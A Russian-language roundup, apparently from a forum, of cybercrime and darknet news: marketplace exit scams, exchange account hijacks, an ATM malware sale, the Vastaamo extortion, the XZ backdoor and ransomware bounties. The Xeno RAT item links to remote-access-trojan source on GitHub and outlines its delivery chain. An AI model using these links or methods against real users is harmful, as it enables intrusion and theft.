Кроме того, главный модератор Empire даже обвиняет разработчиков Tor в том, что они так и не сумели исправить проблемы, из-за которых подобные атаки вообще стали возможны:
«Если бы команда специалистов Tor устранила проблемы, которые делают подобные атаки возможными, думаю, администраторы задержались бы подольше. Сотрудники Tor знают, что нужно сделать для исправления, а именно добавить PoW в сеть. Может быть, они работают над этим сейчас, и приятно видеть, что они все чаще говорят о PoW, но они откладывали это исправление долгие годы. Я скажу даже больше: если бы команда разработчиков Tor добавила PoW несколько лет, возможно, даже Dream Market по-прежнему был бы с нами».
Click to expand...
И хотя до сих пор неясно, скрылись ли администраторы Empire с деньгами пользователей, многие определенно больше не увидят своих средств, находившихся на депозите торговой площадки. Теперь пострадавшие клиенты сетуют, что администрация маркетплейса даже не предоставила им льготный период для вывода средств.
«Я разочарован тем, что администраторы закрыли маркетплейс таким образом. Я прошу прощения у всех, у кого на депозите были деньги. Могу лишь посоветовать вам впредь использовать рынки с MultiSig и использовать их только для крупных заказов», — резюмирует Se7en.
Click to expand...
Россия компания кинула китайскую госкомпанию, продав ей вместо меди гранит , - BloombergВ 2023 году китайский государственный конгломерат Wuchan Zhongda Group приобрел у Российской региональной металлургической компании рафинированной меди.Груз покинул Санкт-Петербург в начале 2024 года года, но в итоге прибыл в Турцию и оказался более дешёвым гранитом. Китайская компания, потерявшая около $20 млн, начала расследование произошедшего, отправив своих сотрудников в Россию. Но те, приехав в рф, "не смогли определить, где находится завод".
В США трем школьникам грозит 10 лет тюрьмы за порчу флага ЛГБТ на асфальте в США.
Заявление на них написал мужик из соседнего бара: по его словам, подростки катались на электросамокатах по флагу и «специально» оставляли на нем следы от шин.
Теперь зумерам грозит до 10 лет бутылки за оскорбление меньшинств, а компания- владелец самокатов запретила клиентам ездить рядом с тем местом.
Хакер получил контроль над аккаунтом китайского трейдера на Binance, не имея пароля, а также без подтверждения 2FA. После ряда сделок злоумышленник вывел активы на $1 млн.
我成了币圈卧底的牺牲品,币安账户里100万美元灰飞烟灭
直到现在我整个人还是懵的,这几乎是我这几年全部的积蓄。… pic.twitter.com/sSNUTXFZsc
— Nakamao (@CryptoNakamao) June 3, 2024__https://twitter.com/x/status/1797519128632381847
Click to expand...
Инцидент произошел 24 мая. В процессе инвестор не получил никаких уведомлений от службы безопасности, по его утверждению.
Привлеченные эксперты определили, что хакер перехватил сеанс пользователя через вредоносный плагин для браузера Chrome под названием AggrTrade с помощью файлов cookie. ПО с открытым исходным кодом предоставляет услуги агрегатора. Решение активно продвигают многие лидеры мнений и некоторые тематические Telegram-каналы, отметил трейдер.
Команда оригинальной платформы AggrTrade 29 мая предупредила о мошенническом расширении, использующем ее бренд. По их словам, афера с 2022 года нацелена на биржи Bitget, Kraken, Binance и другие. Активная промо-кампания скама с привлечением инфлюенсеров началась в марте 2024 года.
Security Breach Alert: We've discovered a fraudulent Chrome extension using our brand AggrTrade. This scam has targeted exchanges like Bitget, Kraken, Binance, and others since 2022. In March 2024, a promo campaign on X & Telegram used crypto influencers to endorse it.
— AggrTradeApp (@AggrTradeApp) May 29, 2024__https://twitter.com/x/status/1795896255249265042
Click to expand...
По итогам инцидента у инвестора возник ряд претензий к работе службы поддержки биржи. Специалисты Binance крайне медленно реагировали на его обращения, утверждает пользователь. Он связался с командой еще в момент, когда хакер продолжал активность в аккаунте, чтобы предотвратить вывод средств, однако это все равно произошло.
Сотрудникам Binance потребовалось больше суток на обращение к биржам KuCoin и Gate.io с просьбой о заморозке украденных активов, что уже оказалось бесполезным.
Пользователь отметил, что начале марта ходили слухи, что по меньшей мере один аккаунт на Binance был перехвачен с помощью мошеннического плагина. Якобы инцидент тогда вызвал реакцию CEO биржи Ричарда Тенга, который заявил о начале расследования. Поэтому инвестор считает, что команда платформы знала о проблеме, но ничего не сделала для ее решения на протяжении длительного времени.
«Причина, по которой я вложил большую сумму в виде стейблкоинов на Binance, заключается в доверии. Однако, когда я столкнулся с рисками, ряд действий платформы оставил странные ощущения», — написал он.
У пользователя OKX украли $2 млн с помощью ИИ
По информации журналиста Колина Ву, трейдер на OKX из Японии лишился активов на сумму более $2 млн.
An OKX user disclosed today that hackers purchased his personal information and used AI to create fake videos. Hackers used these to change the victim's OKX passwords and even 2FA. More than $2 million US were stolen. Be wary of Deepfakes and personal data leaks.…
— Wu Blockchain (@WuBlockchain) June 3, 2024__https://twitter.com/x/status/1797569050090057957
Click to expand...
Злоумышленники приобрели его утекшие в сеть личные данные в Telegram. Затем они зашли на биржу через электронную почту инвестора, заявив о забытом пароле.
Хакеры также использовали синтезированное с помощью ИИ видео для изменения привязанного номера мобильного телефона. Таким образом они получили возможность подтверждать свои действия через Google Authenticator.
В течение суток средства трейдера вывели из его аккаунта на бирже.
Соучредительница Binance Йи Хэ не признала ответственность криптобиржи за то, что нарушение в системе безопасности привело к потере клиентом $1 млн.
«Посмотрите внимательно: учетную запись этого пользователя взломали, поскольку был атакован его собственный компьютер. После взлома хакер не смог вывести средства, поэтому продал монеты жертвы, что привело к торговым потерям», — заявила она.
3 июня стало известно, что хакер получил контроль над аккаунтом китайского трейдера на Binance, не имея пароля и доступа к двухфакторной аутентификации. После ряда сделок злоумышленник вывел активы на $1 млн.
По данным экспертов по безопасности, злоумышленник перехватил сеанс пользователя через вредоносный плагин для браузера Chrome под названием AggrTrade с помощью файлов cookie.
В процессе атаки инвестор не получил ни одного оповещения от системы безопасности Binance. Трейдер также отметил медленную реакцию сотрудников поддержки.
В ответ клиентская служба Binance написала пользователю, что во время инцидента «хакер украл статус входа в вашу учетную запись через плагин и выдавал себя за вас, чтобы выполнять операции и транзакции».
用户您好,对于您的遭遇我们非常遗憾,在客服、安全和风控的同事经过案件分析,本着“公开透明”的原则在此复原场景:
1. 事件发生的原因是您的电脑本身被黑客攻破… https://t.co/ir75ThfkR0
— 币安Binance华语|Web3钱包已上线 (@binancezh) June 3, 2024__https://twitter.com/x/status/1797619613263667290
Click to expand...
По данным биржи, сотрудники безопасности обработали запрос трейдера о заморозке его аккаунта в течение «одной минуты и 19 секунд» с момента получения. Однако к тому времени хакер уже завершил несколько сделок с использованием кредитного плеча на скомпрометированном счете:
«Мы сочувствуем вашей ситуации, но, согласно полученной нами на данный момент информации, причина потери ваших активов заключается в том, что вашими соответствующими устройствами манипулировали из-за установки вредоносных плагинов. К сожалению, у нас нет возможности компенсировать такие случаи, не имеющие никакого отношения к Binance».
Сама жертва не согласилась с такой оценкой, предположив, что компания «давно знала о вредоносном плагине», а также связала адрес злоумышленника с другими киберпреступлениями «три-четыре недели назад».
В киберподполье [набирает](https://dailydarkweb.net/new-atm-malware-threatens- european-banking-security/) популярность нацеленный на банкоматы вЕвропе новый штамм вредоносного ПО под названиемEU ATM Malware с заявленной беспрецедентной эффективностью в 99%.
Согласно утверждениям селлера,EU ATM Malware способен расчехлить практически любой европейский банкомат и до 60% устройств по всему миру, производимыхDiebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, Hitachi и др.
Заявленные экономические ТТХ вредоноса гарантируют покупателю до 30 000 долларов за банкомат, при этом модностью автоматизировано, обеспечивая развертывание и эксплуатацию. Но также имеет и ручной режим работы.
Селлер предлагает гибкую систему оплаты и готов предоставить ежемесячную подписку, демоверсию полезной нагрузки на срок до трех дней, а также первоначальный взнос с выделением доли прибыли от успешных операций.
НасколькоEU ATM Malware соответствует заявленным характеристикам и станет ли реальной угрозой банковского сектора вЕвропе пока не ясно, но будем посмотреть.
Один из основателей финансовой организации Finiko Кирилл Доронин задержан полицией в Казани. Об этом ТАСС сообщил источник в правоохранительных органах.
Позднее факт задержания подтвердили в МВД России. "Сегодня сотрудниками МВД по Республике Татарстан по подозрению в совершении преступления, предусмотренного ч. 4 ст. 159 УК РФ ("Мошенничество"), задержан один из руководителей компании Finiko", - сообщила ТАСС официальный представитель министерства Ирина Волк. По ее словам, от имени этой организации с 2018 года осуществлялась деятельность по привлечению денег граждан под предлогом высокоэффективных инвестиционных вложений, в том числе в финансовые инструменты фондовых рынков и криптовалюты. Компания была зарегистрирована за пределами РФ.
Для того, чтобы привлечь как можно больше клиентов в компании распространялась информация о приеме денег по различным программам, позволяющим выплачивать ежемесячный доход в виде высоких процентов. Однако, по версии следствия, инвестиционная деятельность фактически не велась. "Поступило более 100 заявлений от пострадавших вкладчиков из Краснодарского, Красноярского и Приморского краев, Тюменской, Самарской, Новосибирской, Челябинской, Иркутской областей, а также из Республики Казахстан", - добавила представитель МВД.
В настоящее время в Вахитовском районном суде Казани решается вопрос об избрании подозреваемому меры пресечения. Следствие ходатайствует о заключении его под стражу.
Уголовное дело об организации финансовой пирамиды было возбуждено 7 декабря 2020 года в отношении сотрудников компании Finiko после того, как прокуратура Татарстана провела проверку в организации. В июле появилась информация, что вкладчики Finiko не могут вывести свои средства из личного кабинета. Аккаунты пользователей оказались недоступны. В МВД по Республике Татарстан поступило порядка 100 заявлений от вкладчиков организации, суммы ущерба варьируются от 100 тыс. до 10 млн рублей.
Надзорное ведомство установило, что с августа 2019 года по декабрь 2020 года неустановленные лица, действуя от имени компании на территории Татарстана и других субъектов РФ, организовали работу по привлечению денежных средств физических лиц "под предлогом высокоэффективного их использования путем инвестирования в фондовые рынки, криптовалюту и на иных торговых площадках". Клиентам гарантировали доход до 25% в месяц. Злоумышленники неправомерно привлекли не менее 80 млн рублей. Деньги распределялись между вкладчиками по принципам финансовой пирамиды.
В сети распространяется информация о том, что администратор сервиса публикации деанонов, более известный как Operator и создатель DoxBin - был похищен. Некоторые Telegram каналы публикуют видео и фотографии мужчины с пакетом на голове и связанными руками.
На некоторых видео демонстрируется открытая админ панель проекта, и кошелек Monero с балансом в $400 000. Вместе с этим сообщается, что с личного счета админа ресурса было украдено $3 000 000 и заполучен доступ к его Telegram.
Сайт сервиса недоступен.
Мы напоминаем, что это неподтвержденная информация, достоверной на данный момент нет.
Click to expand...
t.me/lolz_news/7041
Министерство юстиции США предъявило Кеонне Родригес и Уильяму Лонергану Хиллу обвинения в отмывании более 100 миллионов долларов от различных преступных предприятий через Samourai, сервис по сбору криптовалют, которым они управляли почти десять лет.
Как подробно указано в новом обвинительном заключении, преступники также
использовали криптомикшер Whirlpool от Samourai для обработки незаконных
средств на сумму более 2 миллиардов долларов в период с 2015 по февраль 2024
года.
В дополнение к услугам по смешиванию криптовалют, Samourai также предложила
услугу под названием "Ricochet", которая позволяла пользователям отправлять
криптовалюту, используя дополнительные и ненужные промежуточные транзакции,
чтобы помешать усилиям правоохранительных органов и криптобирж по отслеживанию
средств, полученных в результате преступной деятельности.
Эта деятельность по отмыванию денег, как утверждается, принесла двум
основателям около 4,5 миллионов долларов комиссионных за транзакции Whirlpool
и Ricochet.
"С момента запуска сервиса Whirlpool примерно в 2019 году и сервиса Ricochet
примерно в 2017 году через эти два сервиса, которыми управляет Samourai,
прошло более 80 000 BTC (на сумму более 2 миллиардов долларов с учетом курсов
конвертации BTC в USD на момент каждой транзакции)", - утверждается в
обвинительном заключении.
Мобильное приложение Samourai Wallet также было загружено более 100 000 раз, что позволяет пользователям хранить приватные ключи для подконтрольных им BTC- адресов и обмениваться средствами с другими пользователями Samourai в анонимных финансовых транзакциях.
Исландские правоохранительные органы наложили арест на домены Samourai (samourai[.]io и samouraiwallet[.]com) и веб-серверы, а магазин Google Play удалил мобильное приложение для Android после получения ордера на арест.
В 17 лет он обвинялся более чем в 50 000 киберпреступлениях.
25-летнему финну предъявлены обвинения в вымогательстве у некогда популярной, а ныне обанкротившейся онлайновой психотерапевтической компании и ее пациентов. Финские власти редко называют имена подозреваемых в ходе расследования, но они были готовы сделать исключение для Алексантери Кивимяки (он же Zeekill), известного хакера, который в 17 лет обвинялся в более чем 50 000 киберпреступлений, среди которых были кража банковских карт, преследование с использованием телекоммуникаций и различные утечки данных. За все это он был наказан достаточно мягко – всего два года тюрьмы условно
В конце октября 2022 года Кивимяки было предъявлено обвинение (по словам финских властей, он также были заочно арестован, так как находится за границей) в попытке вымогательства денег у центра психотерапии Vastaamo. 21 октября 2020 года Vastaamo стал целью шантажа, когда злоумышленник под ником "ransom_man" потребовал заплатить 40 биткоинов (~450 000 евро на тот момент) в обмен на обещание не публиковать конфиденциальные записи терапевтических сессий.
В сообщениях, опубликованных на одной финскоязычной площадке в дарквебе, ransom_man заявил, что Vastaamo не желает вести переговоры о выплате выкупа, из-за чего он начнет публиковать по 100 наборов данных пациентов каждые 24 часа, чтобы компания хотела продолжать общение с ним.
Но когда компания отказалась платить, ransom_man начал вымогать деньги у отдельных пациентов. По данным финской полиции, около 22 000 жертв сообщили о попытках вымогательства, направленных против них лично. С каждой жертвы злоумышленник требовал по 500 евро.
23 октября 2020 года ransom_man загрузил в дарквеб большой архив, содержащий терапевтические записи всех пациентов Vastaamo. Но в архиве также находилась копия домашней папки ransom_man, что помогло следователям найти ряд улик, которые указывают на Кивимяки. И пускай злоумышленник быстро удалил архив (сопроводив это пометкой “упс”), несколько пользователей успели его скачать.
Среди этих счастливчиков был Антти Куритту, руководитель группы в Nixu Corporation и бывший криминалист. В 2013 году Куритту работал над другими преступлениями, которые Кивимяки совершил в состав группировки Hack the Planet. По его словам, такая ошибка со стороны хакера – огромный провал в сфере операционной безопасности. В той папке специалисты нашли множество полезной информации и баз данных.
По словам Куритту, все люди, которые занимались расследованием преступлений Кивимяки, говорят о том, что за вымогательством денег у Vastaamo также стоит печально известный киберпреступник.
В свою очередь, Кивимяки отрицает все обвинения в Twitter и считает, что финские власти предали это дело огласке, чтобы повлиять на принятие решения по его старым делам.
Более 96% токенов для голосования поддерживают сделку, которая также предусматривает, что Mango Markets не будет предъявлять уголовные обвинения.
Сообщество DeFi-платформы Mango Markets проголосовало в пользу соглашения с хакером. Он вернет $69 млн и оставит себе оставшиеся $47 млн в качестве вознаграждения. Напомним ранее кредитный протокол Mango на Solana стал жертвой взлома . По предварительным оценкам, хакеру удалось заполучить более $100 млн.
За предложение выступили более 96% пользователей. Все участники получат полное возмещение из казначейских средств и откажутся от любых потенциальных претензий и уголовных дел.
Злоумышленник использовал депозит на сумму 10 млн USDC для манипуляций с ценой нативного токена MNGO через открытие крупной маржинальной позиции в бессрочных свопах. Из-за низкой ликвидности на оптовом рынке цена актива кратковременно подскочила с $0,038 до $0,91 — приблизительно на 2295%. Увеличение стоимости залога в MNGO позволило хакеру занять и вывести из протокола средства в нескольких монетах. Вывести средства злоумышленнику позволила не неправильная работа ценовых оракулов, а недостатки системы оценки рисков.
Вознаграждение хакера станет крупнейшим в истории криптовалют. Предлагаемые условия показывают, что 67 миллионов долларов украденных токенов будут возвращены, а 47 миллионов долларов останутся у хакера. 96% избирателей, или 291 миллион токенов, проголосовали за сделку, которая также предусматривает, что Mango Markets не будет возбуждать уголовные дела по этому делу.
Более того, хакер проголосовал за это предложение, используя миллионы токенов, украденных из эксплойта. 14 октября предложение достигло необходимого кворума для принятия. В обмен на урегулирование хакер требует, чтобы пользователи, которые проголосовали за предложение, согласились выплатить вознаграждение, погасить безнадежный долг перед казначейством, отказаться от любых потенциальных претензий в отношении счетов с безнадежным долгом и не проводить никаких уголовных расследований или замораживание средств.
Взлом стал шестым по величине эксплойтом DeFi в истории, уступив взлому Cream Finance на 130 миллионов долларов .
source: dao.mango.markets/dao/MNGO/proposal/GYhczJdNZAhG24dkkymWE9SUZv8xC4g8s9U8VF5Yprne
Кибермошенниками в ЕС чаще всего становятся выходцы из России и Украины, и предпочитают атаковать цели в США, Германии, Франции и Швейцарии, выяснил Европол. Он раскрыл, как устроена работа наиболее опасных преступных сетей
Девять из наиболее опасных преступных группировок в Евросоюзе занимаются киберпреступлениями, большинство их участников — россияне и украинцы, сказано в отчете Европола об организованной преступности.
Активность таких сообществ сосредоточена прежде всего в Германии, Франции, Швейцарии и США. Как выяснил Европол, в них распространена партнерская бизнес- модель. Лидеры преступников передают своим подчиненным специальные вирусы для хищения или вымогательства денег, они же ведут переговоры и получают выкуп, 80% которого получают исполнители.
Всего в докладе сообщается о 821 преступной группировке, которые представляют наибольшую опасность для ЕС, их общая численность превышает 25 тыс. человек. Большинство (36%) занимаются торговлей наркотиками, 18% не сосредоточены на одном типе правонарушений, 15% специализируются на мошенничестве, 6% на нелегальной миграции, 4% на торговле людьми, а киберпреступления предпочитают 1% преступных сетей.
Европол полагает, что все они в силах «нанести значительный ущерб внутренней безопасности ЕС, верховенству закона и экономике». Эти преступные организации проводят трансграничные операции и чаще всего занимаются незаконными оборотом наркотиков, а также мошенничеством, преступлениями против собственности (кража и др.), ввозом нелегальных мигрантов и торговлей людьми.
Более трети (41%) наиболее опасных преступных сетей в Евросоюзе отмывают свои доходы через покупку недвижимости, а также с помощью гостиничного бизнеса и криптовалют. Бухгалтеры и юристы, помогающие проводить сделки с недвижимостью, порой не в курсе преступного происхождения средств. Владельцы при необходимости обмениваются правами собственности, либо используют их для оплаты между собой, в результате такое сочетание незаконной прибыли с законными активами затрудняет установление связи между преступной деятельностью и перемещением активов.
sc: europol.europa.eu/cms/sites/default/files/documents/Europol%20report%20on%20Decoding%20the%20EU-s%20most%20threatening%20criminal%20networks.pdf
Вчерашний баг в Linux меркнет на фоне подоспевших новостей. В XZ Utils версий 5.6.0 и 5.6.1 обнаружили бэкдор под SSH. Об этом [сообщает](https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and- rawhide-users) RedHat и не стесняется в выражениях: «Немедленно вырубайте все инстансы Fedora Rawhide на работе и дома». Капслоком. Знакомьтесь, CVE-2024-3094, 10 из 10.
История пока только разворачивается. Судя по всему, один из мейнтейнеров XZ добавил в него бэкдор под очень нишевые конфигурации и таргетированную атаку по opensshd через systemd и пытался добиться добавления XZ 5.6.x в Fedora 40-41 и не только. Под эту конфигурацию попала свежая Debian Sid, начал лагать SSH, и бэкдор нашли в процессе анализа проблемы. Бэкдор, похоже, под удалённый доступ, у мейнтейнера многолетняя история коммитов с версии 5.4.0, и масштабы компрометации пока неизвестны. В общем, ~~crazy fed shit~~ запасайтесь попкорном, выходные будут яркими. Здесь в комментах подборка постов по основным дистрибутивам.
Администрация одного из крупнейших англоязычных даркнет-форумов планеты совершила экзит скам. Об этом заявил известный в теневом сегменте специалист по информационной безопасности Hugbunter в ветке на Reddit.
«Теперь я могу подтвердить, что это именно экзит скам, избегайте Incognito любой ценой. Обязательно распространите предупреждение везде, где это возможно», — говорится в сообщении, которое также отсылает пользователей к площадке Dread.
Click to expand...
По сообщениям медиа, на Dread действительно обсуждалась ситуация с невозможностью вывода средств в биткоинах и Monero, однако в какой-то момент в переписку пришел администратор Incognito с ником Pharoah. Он заверил присутствующих, что речь идет о временных сложностях, над устранением которых работают специалисты проекта. В дальнейшем ситуация никак не изменилась.
Сам Hugbunter заявил, что Pharoah даже предлагал ему взятку, чтобы аналитик прекратил публиковать посты об Incognito, однако никаких доказательств этому приведено не было. Даркнет-сообщество тем временем начало подсчет потенциальных потерь от предполагаемого экзит скама. Точные объемы средств неизвестны, однако, по более ранним оценкам, капитализация площадки лежала в пределах 10-30 миллионов долларов.
Йеменские хуситы повредили четыре подводных кабеля в Красном море между Джиддой в Саудовской Аравии и Джибути в Восточной Африке, пишет израильское издание Globes.
По его данным, речь идет о кабелях компаний AAE-1, Seacom, EIG и TGN. Атака хуситов вызывает серьезные сбои в интернет-коммуникации между Европой и Азией, сильнее всего пострадали пользователи стран Персидского залива и Индии, отмечает Globes. Вместе с тем издание называет ущерб значительным, но не критичным, поскольку через тот же регион проходят другие кабели, соединяющие Азию, Африку и Европу.
Кабель EIG (European India Gateway) соединяет Южную Европу с Египтом, Саудовской Аравией, Джибути, ОАЭ и Индией. Акциями EIG владеет консорциум, включающий AT&T, Saudi Telecom, Verizon и индийскую Bharat Sanchar.
TGN Atlantic был проложен Tyco International в 2001 году и продан индийской компании Tata Communications в 2005 году за $130 млн.
AAE-1 соединяет Восточную Азию с Европой через Египет. Пропускная способность кабеля — 40 ТБ/с.
Кабель Seacom соединяет Европу, Африку и Индию, а также Южную Африку.
Click to expand...
По оценкам Globes, ремонт поврежденных кабелей может занять не менее восьми недель. Телекоммуникационные компании будут вынуждены искать тех, кто согласится выполнить эти работы и, вероятно, выплатят высокую премию за риски, пишет издание.
Сурс: <https://en.globes.co.il/en/article-houthis-hit-underwater- communications-cables-1001472165>
Сложный троян Xeno, открывающий удалённый доступ к компьютеру жертвы, доступен бесплатно на GitHub. Теперь вредонос стал доступнее и, как следствие, опаснее.
Xeno написан на C# и может работать в системах Windows 10 и Windows 11. Его автор, известный под ником moom825, утверждает, что зловред предоставляет богатый набор функций для удалённого управления ОС.
Среди них отмечаются, например, обратный прокси SOCKS5, возможность записывать аудио в режиме реального времени, а также устанавливать модуль hVNC (hidden virtual network computing).
«Троян написан полностью с нуля, что гарантирует уникальный подход к реализации удалённого доступа», — гласит описание Xeno от разработчика на GitHub.
К слову, moom825 также стоит за разработкой другого вредоноса на C# — DiscordRAT 2.0, которого ранее распространяли в npm-пакетах.
Специалисты Cyfirma отметили, что Xeno попадет на устройства жертв через сеть доставки контента Discord.
«Основной вектор — файлы-ярлыки, замаскированные под скриншоты WhatsApp и выполняющие функции загрузчика. С их помощью в систему помещается ZIP-архив, где он распаковывается и запускается (вторая ступень атаки)», — [пишут исследователи](https://www.cyfirma.com/outofband/xeno-rat-a-new-remote-access- trojan-with-advance-capabilities/).
Вредоносная библиотека подключается с помощью сторонней загрузки, что помогает закрепиться в системе и уйти от детектирования антивирусными средствами.
• Xeno: https://github.com/moom825/xeno-rat
• DiscordRAT 2.0: https://github.com/moom825/Discord-RAT-2.0
На фоне новости об удалении актива с биржи курс XMR в моменте обвалился на 39%, но затем начал восстанавливаться.
Что произошло? Разработчики анонимной криптовалюты Monero (XMR) прокомментировали предстоящий делистинг актива с криптобиржи Binance. Они заверили, что проект никогда не пойдет на компромисс в вопросах конфиденциальности, а пользователи могут продолжать торговать активом на других площадках, включая децентрализованные (DEX), а также с помощью кроссчейн-свопов. Также команда Monero призвала пользователей самостоятельно хранить XMR с помощью некастодиальных кошельков.
Что еще известно? Binance не назвала конкретную причину делистинга, отметив, что решение принято по итогам анализа проекта на предмет соответствия внутренним стандартам. XMR и все торговые пары с активом будут удалены с платформы 20 февраля в 6:00 мск, вывод возможен до 20 мая 6:00 мск. После анонса курс XMR обвалился на 39%, до $102. К моменту написания статьи он частично восстановился до $130,76.
В свою очередь разработчики Monero заявили, что причиной делистинга стали новые требования биржи к депозитам. Так, Binance требует, чтобы средства на ее платформу поступали с публичного прозрачного адреса, в то время как блокчейн Monero по умолчанию применяет функцию сокрытия для всех адресов с момента запуска в апреле 2014 года. Функция скрытых адресов (stealth address) позволяет сгенерировать одноразовый адрес для каждой операции, что затрудняет привязку нескольких переводов к одному и тому же получателю.
Проект поддержала американская криптобиржа Kraken, заявив, что конфиденциальность не является преступлением. Ранее соучредитель Kraken Джесси Пауэлл также выступал в поддержку криптомикшера Tornado Cash. После включения сервиса в санкционный список США в августе 2022 года он заявлял, что пользователи имеют право на финансовую конфиденциальность
Ранее сообщество анонимной криптовалюты Zcash, посчитав делистинг с Binance неизбежным, предложило вовсе отказаться от публичных транзакций. Разработчик Джош Суихарт писал, что проект не должен «потакать прихотям биржи, которая фактически принадлежит финансовым властям США». Инициатива стала ответом на присвоение биржей криптовалюте Zcash пометки Monitoring Tag — она предупреждает пользователей о возможности скорого удаления актива с платформы из-за несоответствия критериям.
Spoiler: Источник
компромисс в вопросах конфиденциальности ](https://getblock.net/news/monero- team-responds-to-binance-delisting-we-will-never-compromise-on-privacy)
На фоне новости об удалении актива с биржи курс XMR в моменте обвалился на 39%, но затем начал восстанавливаться
getblock.net
С помощью специального оборудования у россиян похитили более 150 млн рублей.
Правоохранительные органы поймали в Колпино трёх мужчин, подозреваемых в
массовом хищении денег у россиян с помощью SIM-карт и специального
оборудования для перенаправления трафика. Об этом сообщила официальный
представитель МВД России Ирина Волк.
Полицейские связались со службой безопасности одного из операторов мобильной связи. Им предоставили информацию о том, что в Колпино работает специальное оборудование для перенаправления трафика. За полгода мошенники подключили более 12 тыс. SIM-карт, через которые им удалось перевести более 150 млн рублей.
Мошенники закупали SIM-карты и звонили россиянам, будучи за рубежом. Они убеждали своих жертв, что их деньги следует перевести на так называемые «безопасные счета». Когда человек «на другом конце провода» соглашался, ему диктовали номер телефона, привязанный к этому счёту. Одна SIM-карта использовалась не более двух раз, а затем заменялась на новую.
При обыске у подозреваемых нашли специальное оборудование для одновременного подключения нескольких десятков мобильных номеров, интернет-центры, роутеры, модемы, ноутбуки, телефоны и более 1500 SIM-карт.
Сейчас фигурантов проверяют на причастность как минимум к 13 преступлениям против жителей Петербурга и Ленобласти. Возбуждены уголовные дела по ст. 159 УК РФ. Все они соединены в одно производство. Расследование продолжается.
Государственный департамент США объявил о вознаграждении до 10 миллионов долларов за любую информацию, которая поможет идентифицировать и поймать лидеров хакерской группировки ALPHV/Blackcat. Банда специализируется на кибервымогательстве и за последние годы атаковала уже тысячи компаний.
Дополнительно 5 миллионов долларов обещано за данные о лицах, которые только собираются присоединиться к преступной деятельности Blackcat. По мнению экспертов, это должно отпугнуть потенциальных участников, лишив группировку поддержки.
Как заявили в ФБР, с ноября 2021 года по март 2022 года Blackcat совершила более 60 взломов по всему миру. "Масштаб их деятельности поражает", - прокомментировал представитель бюро.
По последним данным, к сентябрю 2023 года от более чем 1000 жертв было получено выкупов на сумму не менее 300 миллионов долларов. "Это колоссальные деньги, и мы приложим все усилия, чтобы остановить преступников", - заявили в Госдепартаменте.
В опубликованном заявлении Госдепартамент пообещал, что "вознаграждение будет выплачено за информацию о местонахождении или личности любого из ключевых лидеров группы, стоящей за разработкой и распространением вымогательского ПО ALPHV/Blackcat".
Выплаты будут произведены в рамках инициативы по борьбе с транснациональной организованной преступностью. Как отметили в ведомстве, с 1986 года по этой программе уже было выплачено более 135 миллионов долларов.
Для безопасной передачи сведений о Blackcat и других разыскиваемых злоумышленниках Госдепартамент запустил специальный зашифрованный сервер, Tor SecureDrop, в даркнете. По словам сотрудников ведомства, это позволит сохранить анонимность информаторов.
В последнее время власти США активизировали усилия по поиску и задержанию киберпреступников. В январе аналогичное вознаграждение в 10 миллионов долларов было объявлено за данные о лидерах группировки Hive.
Ранее крупные суммы обещались за информацию о причастных к Conti, REvil (Sodinokibi), Darkside и другим опасным хакерским сообществам. По словам экспертов, такие меры как минимум усложнят жизнь преступникам и ослабят их потенциал.
• Source: state.gov/reward-for-information-alphv-blackcat-ransomware-as-a- service/
Бездомный 36-летний мужчина из американского городка Боулинг Грин (штат Кентукки) признался полицейским, что неоднократно покупал в дарке номера ворованных кредиток, чтобы с их помощью оплатить себе проживание в отеле. Согласно судебным материалам, Мэтью Уоллес (Matthew Wallace) делал это на протяжении нескольких месяцев, однако силовикам в итоге удалось выйти на след подозреваемого.
В последний месяц бездомный вошел во вкус — под открытым небом он провел лишь 5 ночей из 30, расплатившись за остальные чужими карточками. В этот промежуток времени он снимал номера, которые обходились ему в сотню долларов за ночь, потратив на них 2500 долларов.
Говоря о причинах совершенных преступлений, Уоллес честно признался, что просто не хотел вместе с бойфрендом ночевать на улице. Оказываясь в тепле, мужчина еще и пытался перепродать данные о пластике другим заинтересованным пользователям дарк-площадок.
Уоллес был обвинен в торговле финансовой информацией и мошенническом использовании кредитной карты. Сейчас он находится в местной тюрьме с возможностью освободиться под залог в размере 25 тысяч долларов. Которых, впрочем, нет ни у него, ни у его любовника.
source: msn.com/en-us/news/crime/man-charged-with-credit-card-fraud- trafficking-financial-info-after-stealing-numbers-from-dark-web/ar-BB1h9nb7
Министерство финансов США внесло в санкционный список, связанный с
кибербезопасностью, 33-летнего гражданина России Александра Ермакова.
Также известен под никами blade_runner, GistaveDore, GustaveDore, JimJones.
Информация об этом размещена на сайте Управления по контролю за иностранными активами Министерства финансов США (OFAC).
«Управление по контролю за иностранными активами Минфина США в координации с Австралией и Великобританией внесло в связанный с кибербезопасностью список россиянина Александра Ермакова, сыгравшего ключевую роль в кибератаке на Medibank в 2022 году», — говорится в сообщении.
Также во вторник, 23 января 2024 года, о введении санкций против Ермакова сообщили министерства иностранных дел Великобритании и Австралии. Австралия, в частности, запретила провдить с Ермаковым финансовые операции, а также запретила ему въезд в страну. “Предоставление активов Александру Ермакову, использование его активов или совершение сделок с ними, в том числе через криптовалютные кошельки, является уголовным преступлением, наказуемым тюремным заключением на срок до 10 лет и крупными штрафами”, — говорится в пресс-релизе на сайте МИД Австралии.
Причиной введения санкций против Ермакова стала кража персональных данных клиентов страховой компании Medibank. В результате кибератаки, участие в которой приписывают Ермакову, было украдено 9,7 млн записей Medibank. Они включали имена, даты рождения, номера медицинских страховок и конфиденциальную медицинскую информацию. Часть записей впоследствии была опубликована в даркнете.
О местонахождении Ермакова не сообщают ни власти США, ни Австралии, ни Великобритании.
• Source: https://www.legislation.gov.au/F2024L00099/latest/text
• Source: https://ofac.treasury.gov/recent-actions/20240123
• Source: <https://www.gov.uk/government/news/uk-and-allies-sanctions-russian- cyber-hacker>
• Source: [https://www.foreignminister.gov.au/...ctions-response-medibank- private-cyber-attack](https://www.foreignminister.gov.au/minister/penny- wong/media-release/cyber-sanctions-response-medibank-private-cyber-attack)
Специалисты китайской ИБ-компании Qihoo 360 опубликовали отчет, в котором обвинили ЦРУ в хакерских атаках на китайские компании и правительственные учреждения. Причем атаки, по словам исследователей, длились более 11 лет.
Аналитики Qihoo 360 утверждают, что с сентября 2008 года по июнь 2019 года ЦРУ взламывало различные цели в области авиационной и нефтяной промышленности Китая, научно-исследовательские институты, а также интернет-компании и государственные учреждения.
